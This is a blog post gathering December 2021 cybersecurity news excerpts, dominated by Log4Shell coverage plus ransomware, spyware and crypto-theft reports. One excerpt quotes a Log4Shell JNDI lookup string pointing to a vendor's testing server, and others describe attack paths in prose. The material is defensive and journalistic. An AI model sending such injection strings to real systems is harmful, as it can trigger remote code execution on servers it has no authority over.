This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
Log4Shell attacks expand to nation-state groups from China, Iran, North Korea, and Turkey https://therecord.media/log4shell-attacks-expand-to-nation-state-groups-from-china-iran-north-korea-and-turkey/
Nation-state groups from China, Iran, North Korea, and Turkey are now abusing the Log4Shell (CVE-2021-44228) vulnerability to gain access to targeted networks, Microsoft said on Tuesday. “This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives, ” the company said in an update on its Log4Shell guidance blog post. also:
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/.
myös: https://www.is.fi/digitoday/tietoturva/art-2000008476944.html
Tomi Engdahl says:
Log4Shell: Reconnaissance and post exploitation network detection
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/#update-wednesday-december-15th-17-30-utc
Update Wednesday December 15th, 17:30 UTC. We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.
Tomi Engdahl says:
StealthLoader Malware Leveraging Log4Shell https://research.checkpoint.com/2021/stealthloader-malware-leveraging-log4shell/
While most miners detected are Linux based, Check Point researchers recently discovered a Win32 executable malware identified as StealthLoader. This.NET-based malware surfaced right after the Log4j vulnerability was discovered. The StealthLoader Trojan performs various evasion techniques in order to avoid detection while using the victim’s resources for coin mining.
Tomi Engdahl says:
Joint Statement on Log4Shell
https://www.enisa.europa.eu/news/statement-on-log4shell
Assessment and advice on the Log4j vulnerability.
Review – Public ICS Disclosures – Log4Shell Advisories 12-14-21 https://chemical-facility-security-news.blogspot.com/2021/12/review-public-ics-disclosures-log4shell.html
Tomi Engdahl says:
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works. Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we’ve ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states. also:
https://www.wired.com/story/nso-group-forcedentry-pegasus-spyware-analysis/
Tomi Engdahl says:
Nation State Threat Group Targets Airline with Aclip Backdoor https://securityintelligence.com/posts/nation-state-threat-group-targets-airline-aclip-backdoor/
In March 2021, IBM Security X-Force observed an attack on an Asian airline that we assess was likely compromised by a state-sponsored adversary using a new backdoor that utilizes Slack. Aclip conducts C2 communications via the Slack API. In this instance, the threat actor created an actor-controlled Slack workspace and channels where they could receive system information, including requested files and screenshots; post commands to the backdoor; and receive commands in return.
Tomi Engdahl says:
CISA warns critical infrastructure to stay vigilant for ongoing threats https://www.bleepingcomputer.com/news/security/cisa-warns-critical-infrastructure-to-stay-vigilant-for-ongoing-threats/
The Cybersecurity and Infrastructure Security Agency (CISA) warned critical infrastructure organizations today to strengthen their cybersecurity defenses against potential and ongoing threats. also:
https://www.cisa.gov/publication/preparing-and-mitigating-potential-cyber-threats
Tomi Engdahl says:
The FBI believes the HelloKitty ransomware gang operates out of Ukraine https://therecord.media/the-fbi-believes-the-hellokitty-ransomware-gang-operates-out-of-ukraine/
Law enforcement agencies typically keep information on threat actors private as much as possible in order to gather evidence, watch, and then orchestrate arrests before suspects can destroy evidence or seek shelter in countries without extradition treaties. However, in a recent data breach disclosure, an Oregon healthcare organization appears to have accidentally revealed that the FBI believes that the HelloKitty (FiveHands) ransomware gang operates out of Ukraine. While the HelloKitty ransomware, also known as FiveHands, has been active since January 2021, details about the gang’s possible location had not been previously shared or disclosed.
Tomi Engdahl says:
AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others https://www.bleepingcomputer.com/news/technology/aws-down-again-outage-impacts-twitch-zoom-psn-hulu-others/
Amazon AWS is experiencing an outage that has impacted numerous online services, including Twitch, Zoom, PSN, Xbox Live, Doordash, Quickbooks Online, and Hulu. Update December 15, 11:27 EST: AWS says the issue behind the outage affecting US-WEST-1 and US-WEST-2 regions has been resolved.
Tomi Engdahl says:
If your AWS account gets hacked you’ll have to foot a massive bill, $45,000 in this case, for making someone else some extra cash.
$45,000 AWS Crypto-Mining Hack Generates $800 of Monero
By Francisco Pires published 1 day ago
Lots of work for $800 worth of cryptocurrency.
https://www.tomshardware.com/news/aws-45000-usd-bill-for-crypto-mining-hack?utm_medium=social&utm_source=facebook.com&utm_content=tomsguide&utm_campaign=socialflow
An Amazon Web Services (AWS) customer had a really bad day when they received an unsolicited $45,000 bill for renting computing power from Amazon’s cloud based servers. Further investigation showed that the customer’s account was hacked, allowing the bad actors to spin up AWS servers around the globe while running a cryptocurrency mining software for privacy-focused coin Monero.
the advent of cryptocurrencies brought about the possibility to directly exchange computing power for cryptocurrency tokens. That, in turn, has turned users’ cloud computing accounts into gold. Even if in this case, the amount of cryptocurrency actually earned was comparably pitiful compared to the costs it generated with it: 6 Monero coins worth approximately $800 were minted for a $45,000 cost.
Tomi Engdahl says:
Kotien pienestä laatikosta saattoi tulla vaarallinen: ”Harva osaa säätää”
Myös kotireititin voi sisältää viime viikolla paljastuneen haavoittuvuuden, eikä tavallinen käyttäjä voi tehdä asialle paljoakaan.
https://www.is.fi/digitoday/tietoturva/art-2000008480187.html
INTERNETIN rakenteisiin iskenyt log4shell-haavoittuvuus saattaa olla uskottua suurempi riski kotikäyttäjille. Tähän mennessä tietoturva-aukon on uskottu koskevan lähinnä verkkopalvelimia, joiden kanssa tavalliset kuluttajat eivät ole tekemisissä.
Liikenne- ja viestintävirasto Traficomin Kyberturvallisuuskeskuksen tietoturva-asiantuntija Juho Jauhiainen kertoi Cyberwatch Finlandin joulukuun katsauksessa digi- ja kyberturvallisuuden maailmaan, että kodeissa yleiset reitittimet saattavat olla vaarassa.
Reitittimiä käytetään yleensä langattoman wifi-verkon luomiseen ja monet niistä toimivat myös laajakaistamodeemeina.
Tilanne on epäselvä, sillä tapahtumakirjauksia tekevä log4j-niminen haavoittuva ohjelmakomponentti on erittäin laajasti käytössä verkkosovellusten osana. Toisin kuin moni on luullut, ohjelmakirjastoa käytetään osana muitakin kuin Java-ohjelmointikielellä toteutettuja sovelluksia. Se saattaa olla osa myös monien reitittimien ohjelmistoja.
– Olet kotireitittimen ylläpitäjä, joten tämä koskee sinua.
Tavallisen käyttäjän kannalta tilanne on ikävä. Osa reitittimistä osaa päivittää itse itsensä, toiset on päivitettävä käsin – mikä on useimmille ihmisille tuntematon toimenpide – ja osa laitteista on käytännössä heitteillä.
– Harva kotikäyttäjä osaa reititintään säätää tai päivittää, Jauhiainen sanoi.
SELVYYTTÄ asiaan tulee vasta myöhemmin, sillä haavoittuvuuden vaikutuksia vasta kartoitetaan maailmanlaajuisesti. Osa vaikutuksista selvinnee vasta pitkien aikojen päästä. Tällä hetkellä varmaa on lähinnä se, että älypuhelimet eivät ole haavoittuvia.
– Tämä jatkuu kuukausia tai vuosia, ja ikinä sitä ei saada joka paikasta korjattua. Tämä on maratoni, ei pikamatka, Jauhiainen kuvaili.
Haavoittuvuuden hyväksikäyttäminen on helppoa, eikä vaadi suurta teknistä osaamista. Aukon sisältävälle laitteelle voi antaa etäyhteyden kautta syötteen, jota siinä toimiva log4j-komponentti luulee suoritettavaksi ohjelmakoodiksi ja alkaa ajaa hyökkäyskoodia.
– Väitän, että sellaista organisaatiota ei ole, jota tämä ei jollain tavalla koske, Jauhiainen sanoi.
HAAVOITTUVUUS on ollut olemassa yli kahdeksan vuotta, mutta se raportoitiin ensimmäisen kerran marraskuussa. Raportin teki kiinalainen Alibaban työntekijä.
Haavoittuvuus löydettiin Minecraft-pelistä. Siinä oli mahdollista kirjoittaa keskustelulle tarkoitettuun chat-kenttään komentoja, jotka palvelin suoritti.
Pilvipalveluyritys Cloudflare huimasi ensimmäiset log4shell-hyökkäykset joulukuun alussa. Ensimmäinen korjauspäivitys tuli 9.12.
Suomessa ilmoituksia murroista Kyberturvallisuuskeskukselle ei ole tehty vielä montaa. Jauhiaisen mukaan tämä on yleistä laajojen tietoturvapandemioiden yhteydessä, sillä haavoittuvuuden havaitseminen omassa järjestelmässä saattaa kestää viikkoja.
Tomi Engdahl says:
Log4j software bug could cause ‘incalculable’ damage: What you need to know
Casual computer users have probably never heard of this logging software, but it’s used across the entire internet.
https://www.cnet.com/tech/services-and-software/the-log4j-software-bug-could-put-your-favorite-sites-at-risk-what-you-need-to-know/
Why is this a big deal?
If exploited, the vulnerability could allow an attacker to take control of Java-based web servers and launch remote-code execution attacks, which could give them control of the computer servers. That could open up a host of security-compromising possibilities.
Microsoft said Tuesday that it had found evidence of the flaw being used by tracked groups based in China, Iran, North Korea and Turkey. Those include an Iran-based ransomware group, as well as other groups known for selling access to systems for the purpose of ransomware attacks. Those activities could lead to an increase in ransomware attacks down the road, Microsoft said.
Bitdefender also reported that it detected attacks carrying a ransomware family known as Khonsari against Windows systems.
Most of the activity detected by the CISA has so far been “low level” and focused on activities like cryptomining, CISA Executive Assistant Director Eric Goldstein said on a late Tuesday call with reporters.
Cryptomining attacks, sometimes known as cryptojacking, allow hackers to take over a target computer with malware to mine for bitcoin or other cryptocurrencies. DDoS, or distributed denial of service, attacks involve taking control of a computer to flood a website with fake visits, overwhelming the site and knocking it offline.
Izrael also worries about the potential impact on companies with work-from-home employees.
What’s the fallout going to be?
It’s too soon to tell.
Check Point notes that the news comes just ahead of the height of the holiday season when IT desks are often running on skeleton crews and might not have the resources to respond to a serious cyberattack.
The US government has already warned companies to be on high alert for ransomware and cyberattacks over the holidays, noting that cybercriminals don’t take time off and often see the festive season as a desirable time to strike.
Tomi Engdahl says:
Statement on Apache Log4j Vulnerability
https://www.tp-link.com/fi/support/faq/3255/
TP-Link is aware of the vulnerability in Apache Log4j (CVE-2021-44228: Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints).
https://www.tp-link.com/fi/support/faq/3255/
Tomi Engdahl says:
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter. Since then, it has been disclosed that in certain non-default conditions, the original patch was incomplete; this was designated as CVE-2021-45046 and a new version of Log4j, 2.16.0, has been released.
This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
https://log4j-tester.trendmicro.com/
It allows you to generate a request that you can run in your environment and test if the server is vulnerable.
There are three options for using this tool:
Use the generated JNDI snapshot and add that entry to any of the form fields on the site or add this to the HTTP Header for User-Agent.
Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/957ba47b-e523-4400-85c6-d23f12a66145}
For Internal Server: Generate a quick curl command to test your servers.
For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.
Tomi Engdahl says:
Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
This page lists all the security vulnerabilities fixed in released versions of Apache Log4j 2. Each vulnerability is given a security impact rating by the Apache Logging security team
Fixed in Log4j 2.12.2 and Log4j 2.16.0
CVE-2021-45046
CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.
Fixed in Log4j 2.15.0
CVE-2021-44228
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
Tomi Engdahl says:
Hackers Steal $140 Million From Users of Crypto Gaming Company https://www.vice.com/en/article/4awxep/hackers-steal-dollar140-million-from-users-of-crypto-gaming-company
VulcanForge becomes the third cryptocurrency company to be hit by hackers this month. In total, hackers have stolen more than $400 million.
Tomi Engdahl says:
Billion-dollar natural gas supplier Superior Plus hit with ransomware https://www.zdnet.com/article/billion-dollar-natural-gas-supplier-superior-plus-hit-with-ransomware/
Superior Plus becomes the latest oil & gas company to suffer from a ransomware attack after Colonial Pipeline was hit in May. Superior Plus Press Release:
http://www.superiorplus.com/press-release/?year=2021&workflowId=1e7c0589-f294-4596-ab0d-35c821e098ba
Tomi Engdahl says:
Hackers Spread ‘Antiwork’ Message Via Insecure Business Receipt Printers
December 7, 2021,
https://god.dailydot.com/antiwork-message-receipt-printers/
Workers across the U.S. have begun to find that their store receipt printers are randomly printing off pro-labor and pro-union messages as “hackers” use a wireless printing trick to spread these sentiments to those who need it most—the underpaid, undervalued, and overworked. The receipts.
“ARE YOU BEING UNDERPAID?” asks one such receipt posted to Twitter. “You have a legal, protected right to discuss your pay with your coworkers. This should be done on a regular basis to make sure everyone is being paid fairly. It is ILLEGAL for your employer to punish you for doing this.”
Tomi Engdahl says:
Merry Hackmas: multiple vulnerabilities in MSI’s products
https://voidsec.com/multiple-vulnerabilities-in-msi-products/
This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with.
Tomi Engdahl says:
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the “BlastDoor” sandbox), passing any image file received with the extension .gif:
[IMGIFUtils copyGifFromPath:toDestinationPath:error]
Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn’t mean it’s really a GIF file.
Tomi Engdahl says:
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips https://thehackernews.com/2021/12/researchers-uncover-new-coexistence.html
Cybersecurity researchers have demonstrated a new attack technique that makes it possible to leverage a device’s Bluetooth component to directly extract network passwords and manipulate traffic on a Wi-Fi chip. The novel attacks work against the so-called “combo chips, ”
which are specialized chips that are equipped to handle different types of radio wave-based wireless communications, such as Wi-Fi, Bluetooth, and LTE.
Tomi Engdahl says:
Second Log4j Vulnerability (CVE-2021-45046) Discovered New Patch Released
https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html
The incomplete patch for CVE-2021-44228 could be abused to “craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack, ” the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, the component that’s at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.
Tomi Engdahl says:
Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html
Researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can “allow for exfiltration of sensitive data in certain circumstances.” Additional technical details of the flaw have been withheld to prevent further exploitation, but it’s not immediately clear if this has been already addressed in version 2.16.0. The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.
Tomi Engdahl says:
Log4j attackers switch to injecting Monero miners via RMI
https://www.bleepingcomputer.com/news/security/log4j-attackers-switch-to-injecting-monero-miners-via-rmi/
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success. This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
Tomi Engdahl says:
Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions https://blog.checkpoint.com/2021/12/16/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/
Check Point Research (CPR) spots a botnet variant that has stolen nearly half a million dollars’ worth of cryptocurrency through a technique called “crypto clipping”. The new variant, named Twizt and a descendant of Phorpiex, steals cryptocurrency during transactions by automatically substituting the intended wallet address with the threat actor’s wallet address. CPR warns cryptocurrency traders to beware of who they send funds to, as 969 transactions have been intercepted and counting. Twizt can operate without active C&C servers, enabling it to evade security mechanisms.
Tomi Engdahl says:
New PseudoManuscrypt malware has infected 35, 000 systems this year
https://therecord.media/new-pseudomanuscrypt-malware-has-infected-35000-systems-this-year/
A new malware botnet named PseudoManyscrypt has infected roughly 35,
000 Windows computers this year, security firm Kaspersky said today.
First spotted in January 2021, the botnet is currently distributed via pirated software installers and application cracks advertised on several internet sites. Kaspersky said it discovered the new malware after it infected systems running industrial control systems monitored by its ICS division. A deep dive into the malware’s code found that PseudoManyscrypt is akin to a malware Frankenstein, being assembled by copying features and code from a variety of other malware strains, ranging from regular commodity malware like Fabookie to some portions being borrowed from malware developed by Chinese (APT41) and North Korean (Lazarus Group) cyber-espionage groups.
Tomi Engdahl says:
Coombe hospital ‘operating normally’ despite cyber attack
https://www.rte.ie/news/dublin/2021/1216/1267129-coombe-hospital/
The IT systems at the Coombe Hospital in Dublin have been locked down as an investigation begins into a cyber attack. In a statement, the Coombe Women and Infants University Hospital confirmed it had been the subject of a cyber attack overnight. It said services are continuing as normal, but its IT systems are locked down on a “precautionary basis”.
Tomi Engdahl says:
NY Man Pleads Guilty in $20 Million SIM Swap Theft https://krebsonsecurity.com/2021/12/ny-man-pleads-guilty-in-20-million-sim-swap-theft/
A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps, ”
scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.
Tomi Engdahl says:
Cloudflare is experiencing widespread latency and timeouts
https://www.bleepingcomputer.com/news/technology/cloudflare-is-experiencing-widespread-latency-and-timeouts/
Cloudflare is experiencing widespread latency issues with their network and services, causing websites to load slowly and customers to experience performance issues accessing the customer dashboard. The issues started at around 3 PM EST and affect sites worldwide, including BleepingComputer. This problem affects different regions differently, with some areas not having any problems accessing a website, while others find it very slow.
Tomi Engdahl says:
Meta Targets ‘Cyber Mercenaries’ Using Facebook to Spy
https://www.securityweek.com/meta-targets-cyber-mercenaries-using-facebook-spy
Facebook parent Meta announced Thursday the shutdown of some 1,500 accounts tied to “cyber mercenary” companies accused of spying on activists, dissidents and journalists worldwide on behalf of paying clients.
The Facebook and Instagram pages were linked to seven firms, with services allegedly ranging from scooping up public information online to using fake personas to build trust with targets or digital snooping via hack attacks.
Meta unveiled plans to alert about 50,000 people it believes may have been targeted in over 100 nations by firms that include several based or founded in Israel, which is a leading player in the cybersurveillance industry.
“The surveillance-for-hire industry… looks like indiscriminate targeting on behalf of the highest bidder,” Nathaniel Gleicher, head of security policy at Facebook, told a press briefing.
Tomi Engdahl says:
Google Says NSO Pegasus Zero-Click ‘Most Technically Sophisticated Exploit Ever Seen’
https://www.securityweek.com/google-says-nso-pegasus-zero-click-most-technically-sophisticated-exploit-ever-seen
Security researchers at Google’s Project Zero have picked apart one of the most notorious in-the-wild iPhone exploits and found a never-before-seen hacking roadmap that included a PDF file pretending to be a GIF image with a custom-coded virtual CPU built out of boolean pixel operations.
Tomi Engdahl says:
Thousands of Industrial Systems Targeted With New ‘PseudoManuscrypt’ Spyware
https://www.securityweek.com/thousands-industrial-systems-targeted-new-pseudomanuscrypt-spyware
Tens of thousands of devices around the world, including many industrial control systems (ICS) and government computers, have been targeted in what appears to be an espionage campaign that involves a new piece of malware dubbed PseudoManuscrypt, Kaspersky revealed on Thursday.
The attacks targeted 35,000 devices in 195 countries between January and November 2021, including devices housed by high-profile organizations. Roughly seven percent of the targets were ICS, with the engineering and building automation sectors being most impacted. Attacks were also aimed at military industrial enterprises and research laboratories.
Tomi Engdahl says:
Iran-Linked APT Abuses Slack in Attacks on Asian Airline
https://www.securityweek.com/iran-linked-apt-abuses-slack-attacks-asian-airline
The Iran-linked advanced persistent threat (APT) actor MuddyWater was observed deploying a backdoor that abuses Slack on the network of an Asian airline, IBM Security X-Force reports.
Also referred to as MERCURY, Seedworm, Static Kitten, and ITG17, the hacking group is mainly focused on targets in the Middle East and other parts of Asia.
Tomi Engdahl says:
North American Propane Distributor ‘Superior Plus’ Discloses Ransomware Attack
https://www.securityweek.com/north-american-propane-distributor-superior-plus-discloses-ransomware-attack
Tomi Engdahl says:
Threat Groups Reportedly Working on Log4Shell Worm
https://www.securityweek.com/threat-groups-reportedly-working-log4shell-worm
Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability, but many experts say that — if such a worm is created — it may not be as bad as it sounds.
According to researcher Greg Linares, at least three groups — ones that have been linked to Eastern Europe, Russia and China — are looking into creating a Log4Shell worm, mostly for financially-motivated attacks that involve extortion or selling access to compromised hosts to ransomware groups.
https://twitter.com/Laughing_Mantis/status/1470165580736987137
Tomi Engdahl says:
Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw
https://www.securityweek.com/microsoft-spots-multiple-nation-state-apts-exploiting-log4j-flaw
If defenders needed any more urgency to patch and mitigate the explosive Log4j zero-day, along comes word that APT actors linked to China, Iran, North Korea and Turkey have already pounced and are actively exploiting the CVSS 10.0 vulnerability.
Security response teams at Microsoft on Wednesday confirmed nation-state hackers are poking at CVE-2021-44228 (the identifier for the Log4j vulnerability) to launch high-end malware implants.
Redmond’s Threat Intelligence Center (MSTIC) expressly identified nation-state backed hacking teams from China, Iran, North Korea, and Turkey as the adversaries exploiting the flaw.
“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” Microsoft said in a note on Log4j exploitation.
Tomi Engdahl says:
PinePhone Malware Surprises Users, Raises Questions
https://hackaday.com/2021/12/16/pinephone-malware-surprises-users-raises-questions/
On December 5th, someone by the IRC nickname of [ubuntu] joined the Pine64 Discord’s #pinephone channel through an IRC bridge. In the spirit of December gift-giving traditions, they have presented their fellow PinePhone users with an offering – a “Snake” game. What [ubuntu] supposedly designed had the potential to become a stock, out-of-the-box-installed application with a small but dedicated community of fans, modders and speedrunners.
Shockingly, it was a trojan! Beneath layers of Base64 and Bashfuscator we’d encounter shell code that could be in the “example usage” section of a modern-day thesaurus entry for the word “yeet“.
The malicious part of the code is not sophisticated – apart from obfuscation, the most complex thing about it is that it’s Bash, a language with unreadability baked in. Due to the root privileges given when installing the package, the find-based modern-day equivalent of rm -rf /* has no trouble doing its dirty work of wiping the filesystem clean, running a shred on every file beforehand if available to thwart data recovery. As for the “wipe the cellular modem’s firmware” bonus part, it exploits the CVE-2021-31698. All of that would happen on next Wednesday at 20:00, with scheduling done by a systemd-backed cronjob.
[ubuntu] didn’t share sources, just the binaries, packaged for easy installation on Arch Linux. One of the prominent PinePhone community members installed that binary and enjoyed the “game” part of it, asking about plans to make it open-source – receiving reassurance from [ubuntu] that the sources would be released eventually, “just need to clean it up”. Some weren’t so sure, arguing that people shouldn’t sudo install-this random games without a source code repo link.
Tomi Engdahl says:
Kyberalalle uusi vetäjä
https://etn.fi/index.php/13-news/12973-kyberalalle-uusi-vetaejae
Kyberala ry:n eli Finnish Information Security Clusterin (FISC) toiminnanjohtajaksi on nimitetty Peter Sund. Hän aloittaa tehtävässään heti ensi vuoden alussa. Sund on työskennellyt aiemmin laaja-alaisesti turvallisuuden parissa kotimaan, EU:n, YK:n sekä yritysten tehtävissä. Tutkimustoiminnassaan Sund on keskittynyt erityisesti kyberturvallisuuden hallinto- ja johtamisjärjestelmiin sekä niiden oikeudellisiin kysymyksiin.
https://www.uusiteknologia.fi/2021/12/17/kyberala-saa-uuden-vetajan/
Tomi Engdahl says:
Security firm Blumira discovers major new Log4j attack vector
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
A basic Javascript WebSocket connection can trigger a local Log4j remote code attack via a drive-by compromise. Wonderful. Truly wonderful.
It doesn’t rain, but it pours. Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector.
this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it’s even harder to detect this vulnerability and attacks using it.
This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network.
Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads.
WebSockets have their own security risks. WebSockets aren’t restricted by same-origin policies like a normal cross-domain HTTP request. Instead, they expect the webserver to validate a request’s origin. In short, they don’t come with much in the way of built-in security measures.
In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly.
Making matters worse, it doesn’t need to be localhost. WebSockets allow for connections to any IP. Let me repeat, “Any IP” and that includes private IP space.
Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099.,
Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever he wants.
Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability.
What can you do about this? Blumira suggests the following:
Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further. This includes moving any custom applications in their dependency manifests to 2.16 as soon as possible to avoid incidental exploitation.
You should also look closely at your network firewall and egress filtering. The mission here is to restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce the risk as you patch your applications. In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked.
Good luck, get back to work hunting down Log4j libraries
Tomi Engdahl says:
Log4j: Major IT vendors rush out fixes for this flaw and more ahead of Christmas
IBM and Cisco release Log4j fixes as VMware patches critical non-Log4j flaw.
https://www.zdnet.com/article/vmware-patches-critical-non-log4j-flaw-as-ibm-cisco-release-log4j-fixes/
Tomi Engdahl says:
Log4j – What should boards be asking?
https://www.ncsc.gov.uk/blog-post/log4j-vulnerability-what-should-boards-be-asking
The Log4j issue has the potential to cause severe impact to many organisations. As cyber security experts attempt to detect which software and organisations are vulnerable, attackers start to exploit the vulnerability. Initial reports indicate this is likely to include remote control malware and ransomware. However the situation is fluid and changing regularly.
Tomi Engdahl says:
Log4j – TellYouThePass ransomware revived in Linux, Windows Log4j attacks
https://www.bleepingcomputer.com/news/security/tellyouthepass-ransomware-revived-in-linux-windows-log4j-attacks/
Threat actors have revived an old and relatively inactive ransomware family known as TellYouThePass, deploying it in attacks against Windows and Linux devices targeting a critical remote code execution bug in the Apache Log4j library. KnownSec 404 Team’s Heige first reported these attacks on Twitter on Monday after observing that the ransomware was dropped on old Windows systems using exploits targeting the flaw tracked as CVE-2021-44228 and known as Log4Shell.
Tomi Engdahl says:
Log4j – CISA.GOV – EMERGENCY DIRECTIVE 22-02 Mitigate Apache Log4j vulnerability
https://www.cisa.gov/emergency-directive-22-02
CISA has determined that this vulnerability poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action. This determination is based on the current exploitation of this vulnerability by threat actors in the wild, the likelihood of further exploitation of the vulnerability, the prevalence of the affected software in the federal enterprise, and the high potential for a compromise of agency information systems.
Log4j – Ransomware Advisory: Log4Shell Exploitation for Initial Access & Lateral Movement https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement
A week after the Log4j2 vulnerability became public, AdvIntel discovered the most concerning trend – the exploitation of the new CVE by one of the most prolific organized ransomware groups – Conti.
Tomi Engdahl says:
Log4j – TellYouThePass ransomware via Log4Shell exploitation / Windows and Linux ransomware https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html
The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23. Research has been published in the Chinese-speaking community, but not in the English-speaking community until now.
Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).
Tomi Engdahl says:
US federal agency compromised in suspected APT attack
https://therecord.media/us-federal-agency-compromised-in-suspected-apt-attack/
